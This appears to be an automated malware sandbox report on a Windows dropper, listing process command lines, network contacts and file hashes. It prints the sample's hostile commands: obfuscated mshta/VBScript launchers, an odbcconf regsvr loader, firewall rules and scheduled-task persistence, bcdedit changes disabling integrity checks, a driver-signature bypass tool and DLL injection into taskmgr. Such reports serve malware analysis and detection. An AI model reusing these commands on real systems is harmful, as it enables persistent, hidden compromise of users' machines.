C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed106168c8ce90b57b8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1095e8d3cef4ec773.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1001440e7e09.exe /mixtwo

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed109189c07b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10eb606bd1d021d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10a80f141fb08.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10799545d143108.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10520e75c2eb.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1015ba90d2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10a0affb29d.exe

Wed10a0affb29d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe

Wed10eb606bd1d021d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10799545d143108.exe

Wed10799545d143108.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10b607271059cb7.exe

Wed10b607271059cb7.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe

Wed106168c8ce90b57b8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1015ba90d2.exe

Wed1015ba90d2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1001440e7e09.exe

Wed1001440e7e09.exe /mixtwo

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10d7483856.exe

Wed10d7483856.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe

Wed103b2f384c2a.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe

Wed10fa57e769925f6.exe

C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp

"C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp" /SL5="$70126,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10b607271059cb7.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe

Wed109189c07b.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed101f2195049.exe

Wed101f2195049.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10520e75c2eb.exe

Wed10520e75c2eb.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10a80f141fb08.exe

Wed10a80f141fb08.exe

C:\Users\Admin\AppData\Local\Temp\is-NADBA.tmp\Wed10fa57e769925f6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-NADBA.tmp\Wed10fa57e769925f6.tmp" /SL5="$60122,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe" -u

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe

Wed1095e8d3cef4ec773.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCRiPT: CloSe ( CREaTeObjEcT ( "WsCrIPT.sheLl"). rUN ( "C:\Windows\system32\cmd.exe /q /c COPy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10520e75c2eb.exe"" ..\r3AxJr.EXE && StArt ..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq & if """" == """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10520e75c2eb.exe"" ) do taskkill -Im ""%~nxJ"" /f " , 0 , TRue ) )

C:\Users\Admin\AppData\Local\Temp\is-J39I9.tmp\Wed101f2195049.tmp

"C:\Users\Admin\AppData\Local\Temp\is-J39I9.tmp\Wed101f2195049.tmp" /SL5="$301D4,140047,56320,C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed101f2195049.exe"

C:\Users\Admin\AppData\Local\Temp\is-SALSK.tmp\Wed10fa57e769925f6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SALSK.tmp\Wed10fa57e769925f6.tmp" /SL5="$401EE,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /c COPy /y "C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10520e75c2eb.exe" ..\r3AxJr.EXE && StArt ..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq & if "" == "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10520e75c2eb.exe" ) do taskkill -Im "%~nxJ" /f

C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE

..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "Wed10520e75c2eb.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCRiPT: CloSe ( CREaTeObjEcT ( "WsCrIPT.sheLl"). rUN ( "C:\Windows\system32\cmd.exe /q /c COPy /y ""C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE"" ..\r3AxJr.EXE && StArt ..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq & if ""/p0HZ0v12j8OSomYiesvSh7Gq "" == """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE"" ) do taskkill -Im ""%~nxJ"" /f " , 0 , TRue ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /c COPy /y "C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE" ..\r3AxJr.EXE && StArt ..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq & if "/p0HZ0v12j8OSomYiesvSh7Gq " == "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE" ) do taskkill -Im "%~nxJ" /f

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBSCRipT: clOSE ( CreAteObjEcT ( "WscRIpT.shell" ). ruN ( "CMD.eXe /R Echo | SET /p = ""MZ"" > b01RrZ3N.ZT & CoPY /b /y B01RRZ3N.ZT + s4FCF.WN + YcQIVW._ ..\GOWX.SHv & starT odbcconf /A { rEgsvR ..\GOwX.SHv } & DEL /Q * ", 0 , True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R Echo | SET /p = "MZ" > b01RrZ3N.ZT & CoPY /b /y B01RRZ3N.ZT + s4FCF.WN + YcQIVW._ ..\GOWX.SHv & starT odbcconf /A {rEgsvR ..\GOwX.SHv } & DEL /Q *

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>b01RrZ3N.ZT"

C:\Windows\SysWOW64\odbcconf.exe

odbcconf /A {rEgsvR ..\GOwX.SHv }

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241107052124.log C:\Windows\Logs\CBS\CbsPersist_20241107052124.cab

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe"

C:\Program Files (x86)\Gparted\Build.sfx.exe

"C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1

C:\Program Files (x86)\Gparted\Build.exe

"C:\Program Files (x86)\Gparted\Build.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe /306-306

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com

C:\Program Files (x86)\Gparted\gimagex.exe

"C:\Program Files (x86)\Gparted\gimagex.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 1676

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

Network

Country Destination Domain Proto
FR 212.193.30.45:80 212.193.30.45 tcp
FR 212.193.30.45:443 tcp
US 8.8.8.8:53 56.jpgamehome.com udp
FR 212.193.30.45:443 tcp
FR 212.193.30.29:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 webdatingcompany.me udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 buy-fantasy-gxmes.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 52.203.72.196:443 www.listincode.com tcp
US 172.67.74.161:443 iplogger.org tcp
US 54.205.158.59:443 www.listincode.com tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 fouratlinks.com udp
US 8.8.8.8:53 tweakballs.com udp
US 8.8.8.8:53 c.pki.goog udp
DE 49.12.219.50:4846 tcp
GB 142.250.187.227:80 c.pki.goog tcp
FI 65.108.69.168:16278 tcp
US 8.8.8.8:53 boomboomrequest.com udp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 trumops.com udp
US 172.67.133.215:80 wfsdragon.ru tcp
US 8.8.8.8:53 retoti.com udp
US 8.8.8.8:53 logs.trumops.com udp
DE 212.192.241.62:80 tcp
US 8.8.8.8:53 logs.retoti.com udp
US 8.8.8.8:53 2d51cb5b-1da0-4faf-aa11-8c884689fd0c.uuid.trumops.com udp
US 8.8.8.8:53 server16.trumops.com udp
US 44.221.84.105:443 server16.trumops.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
DE 49.12.219.50:4846 tcp
US 8.8.8.8:53 www.yahoo.com udp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.22:443 bitbucket.org tcp
DE 49.12.219.50:4846 tcp
FI 65.108.69.168:16278 tcp
DE 49.12.219.50:4846 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp
DE 49.12.219.50:4846 tcp
US 8.8.8.8:53 vsblobprodscussu5shard20.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard20.blob.core.windows.net tcp
DE 49.12.219.50:4846 tcp
US 72.84.118.132:8080 tcp
DE 49.12.219.50:4846 tcp
FI 65.108.69.168:16278 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
US 8.8.8.8:53 dumancue.com udp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
FI 65.108.69.168:16278 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
FI 65.108.69.168:16278 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
FI 65.108.69.168:16278 tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 532d84cb3e0928c7bedc0a89611837da
SHA1 b7dec859275a299e9c95833be01b055b2f9b91d7
SHA256 9aca2b6f263e24f8161def69b0e8a3a8dbc60bf46ee75714531e7ca09e4e9616
SHA512 c80f46401569b3c20eeeb7225f688e99dc94a70a8caf7200141069c3b43c8df7d4b9846174a22e05a50bd775ebe7342f1f0774b3cf1213f3535ee936e7d85366

\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe

MD5 b6140096778ba8327684188903b829f9
SHA1 a8c542ed9b1c29d07cc5c955ef29f3f92531887c
SHA256 32096a36f4ce1bfed14e19eedfd6b882e997c38241a182142332a2bf4c9dbb64
SHA512 7f8fa614fae4aa6622d28f228f5b39a90ebf66f598acb06bbc2a219aeab6a1409393dcd82a03b60e418671c66f9c3da9510fdea9a3aa19716daf9385925f0c6f

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2848-74-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC084C3F6\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

\Users\Admin\AppData\Local\Temp\7zSC084C3F6\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2848-69-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC084C3F6\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/2848-89-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2848-88-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2848-87-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2848-86-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2848-85-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2848-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2848-83-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2848-82-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2848-81-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2848-80-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10a0affb29d.exe

MD5 d60755a29f9dc368fe71fbadf96b640c
SHA1 d3ac47604f6d91cbc76d9013ba9b3c779f69ad27
SHA256 1129ef957be36f46c5ba500a3f48a237069006b699d570360f876f6c186a7606
SHA512 7dadfa4c0401e688ef0ab6f2c5b175f4943243bd97c4310f0f0bbb9fd7f096e80993ea4e9d598109ee6d0436ff2331d485966c831054960cf62ce97b58102c8a

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10520e75c2eb.exe

MD5 18c977c8af2d6a4491109f686b8430ec
SHA1 4265fe935115de077d22f3279b1cf5626a28a623
SHA256 cec7c81038db8fe58fb50abd445d9b48d7b0d575a5c934f7a7d5c53a0be8a0ac
SHA512 4a56c2356b7c41fc9dbd36e02f103f9938d0fe221dd5149705f9ea58e53af6d8da58e1216a77ff792c8ead8aca7a1c052c8d204435e7f4364e3e4cd5b9d54f72

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10799545d143108.exe

MD5 6bddb7edd2648c177e0ef423cc7df23f
SHA1 d83a67835d694dc9d2726794e9c0a1d10bb1c06a
SHA256 af86823aa88c173cb727965d8a7a7d336c4d47e8d4286e0c22e2f2b7ef314e35
SHA512 761e1bd36d6ad0ff68f53784e34a3a34d936e1ec670a7a3692ad20d3bfde20484a593ababf1559ed85590b2481eaba4849b15022c6c0586dbe30237790f4a20a

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe

MD5 99471e8043cb5f141962e1cfe12d44f4
SHA1 57c6baf415f892dfa82c206c1380a34130dad19d
SHA256 1946616cacfd8688bb722a2b1a6a0df117f9d8d877c675704602c2e8301dd509
SHA512 a31de569cf29efa20fad89a43ac55e6f93562d2204158d1d48f4c05f047fc59a6869a90a42184442e88d3b0d611e74c82d420eaccf9cfa08c6d4227c568baf41

\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1001440e7e09.exe

MD5 a66e417ccbb28f68b13711bcfc2c4f9f
SHA1 d0076ec3fd9c50816e3385f1d4ce6231411a2f19
SHA256 91bc4939340bf81d9a1c4e8d5b58717691070e67f2a802fe8b6e5f6f6af39f59
SHA512 215779aa9782dc3568b3463967bab83629c1b84d0fec319f25ec98c8c51e460ad74bcd0261f80690c116139e20b9ff12a8a30777e372fe5eefc770dd35fe0f32

memory/448-150-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2920-155-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1824-145-0x0000000000400000-0x00000000004D8000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1015ba90d2.exe

MD5 4f11e641d16d9590ac1c9f70d215050a
SHA1 75688f56c970cd55876f445c8319d7b91ce556fb
SHA256 efbf94261833d1318a16120c706a80c4853697ce85ffa714e7f5afca1d19e1c0
SHA512 b7358554587bce2ffe5cf5ac7ea6d590b810db2def56369010a7f10eacc89dd9d4c4c42b5bf113372a146d3a3cc55a1f21f269deadec5d483f51236318404007

\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10b607271059cb7.exe

MD5 b84f79adfccd86a27b99918413bb54ba
SHA1 06a61ab105da65f78aacdd996801c92d5340b6ca
SHA256 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49
SHA512 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38

\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10d7483856.exe

MD5 6d8ff7889acdcfd9f785e073e6ab4f4d
SHA1 5a878803d1c355fae35d684f59f26c1b4a838e6c
SHA256 8e50b8cdea9a829fe00a3d81bad328f6f76581d20ba9cc8cf6d8642d0aa882c7
SHA512 fcb23c40e31839402927dc1cdecf750d4c32c609f42337741f400069c8763599ad6604ed9d7fd86d7d6ee7d6f7b4eca7d132ceb5796f2dad99223e619897b3ab

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q9OR27KU91CMJ0GPBJ7K.temp

MD5 0936c6cbb54224f482a417728b354e12
SHA1 050f8c3377bbeb151322f4dde3cc5e0cfa6f409d
SHA256 f852e09fc8519d23ef5f300bb46455c98db0dcf2de273993f87cd053f1245ffa
SHA512 7f4605db2d609b754aab1b6e9f7e9ed89dd00b1b16c24375fab4cd98ca9806f21058560a67b20ea61c6c3158ded63ff0a4e9089bbad9d15748d63f811401f918

\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe

MD5 c7cd0def6982f7b281c6a61d29eec4be
SHA1 f9f600d70d60cf79563e84cec0b883fa3f541690
SHA256 b2525fcbe771148a6c9b9db5786b8ab833391684eb1ac6152e0a311b2a7f3ab9
SHA512 370c2bde411f188575177ca0821e5920496220785a6aac2e40b2a8d4a0f3151b5bca5e6e90688ba02780bbe1ea0bc1894588b10ff24e2c510254e38c0355b13b

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10a80f141fb08.exe

MD5 f4a5ef05e9978b2215c756154f9a3fdb
SHA1 c933a1debeea407d608464b33588b19c299295c6
SHA256 d3a6b444ced1db9e9452bb5fc1f652b0d6b519948ed2e6e348036d2c25147f69
SHA512 f2d11f706d552c21b75f36c8e02edcb9251c95298986b17d48fb179f2f8d1e2e7ef99de9485ba7ee92dd118ad5759b6fa82197319a40b45044fdbdf039582d77

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe

MD5 5b3913c5aaf3e1a91ca73679603ec70b
SHA1 1df5b353c591b14989fae254fb47a529aadd3338
SHA256 8e554195273cc328d37d7e255cbaac6589eb44d596e6e2fea6d3766bf2908d7b
SHA512 c90d8d68591478d095ce86ae5c0c4f654023937d31c35390d3c622ecd2e8c4b9a5b3598cfe49419c094afcb699b95f489016b39799db4949d976d814a05efae3

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe

MD5 0426dbe3753b2d07d3612fceb824a182
SHA1 4f28da2d30710389cabf10385cb8dc5cbf4be74a
SHA256 6fbe7d2d78413b54c593100e706e727f771714e2fa1b584bdc57836b1bd44d60
SHA512 f6aa58bbfd5f976a76da7b12d60d63326d6d78996cb849e0d4075a7f1ea6ce9eb69d90ec5c68e27de9ab4ec4625090a575f2e3b56ff7e28463fabcaa076c4ddd

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe

MD5 314e3dc1f42fb9d858d3db84deac9343
SHA1 dec9f05c3bcc759b76f4109eb369db9c9666834b
SHA256 79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08
SHA512 23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed101f2195049.exe

MD5 5eec35ae4619a7992130f13f66b03002
SHA1 47141ead2a1166234970c3dba5821cee57ddbb4d
SHA256 947efb32f120d30758ff6801dd1118922cff317411e87906aa9153fe928b1156
SHA512 5f8ae8110b7aa626cf1002f1f214ccc2fd09956cb9d2d82d31115adee356ffd529d1eef4f32a2f193fd862029f930ad01f068b22335d61a00ae5b25106c0590a

memory/2848-113-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2848-112-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2848-111-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2848-109-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2848-106-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2848-105-0x0000000000400000-0x000000000051C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe

MD5 5d436a862c018c54ce2427968c556325
SHA1 97d03f2ed1c32b1de5467414a1c2fea6eb86404a
SHA256 060b9cbca548f4fbd738d79b735852476783b7bce3b373ec620b31fb9f8e39dc
SHA512 2c16938ca1a944b36f944d74ffdb5f6ec4c5f8a49688d6746d966cafcd55287b2794b010875bc3868b3a8e7a587b0160ee564244e98b61e8a59b978954b2ba78

memory/2380-169-0x0000000000400000-0x0000000000414000-memory.dmp

memory/496-168-0x0000000001000000-0x0000000001008000-memory.dmp

memory/2632-172-0x0000000000FE0000-0x0000000001022000-memory.dmp

memory/1792-174-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2632-186-0x0000000000350000-0x0000000000356000-memory.dmp

memory/2904-189-0x0000000000DA0000-0x0000000000E08000-memory.dmp

memory/2632-194-0x00000000003E0000-0x0000000000410000-memory.dmp

memory/2960-188-0x0000000000F40000-0x0000000000FA8000-memory.dmp

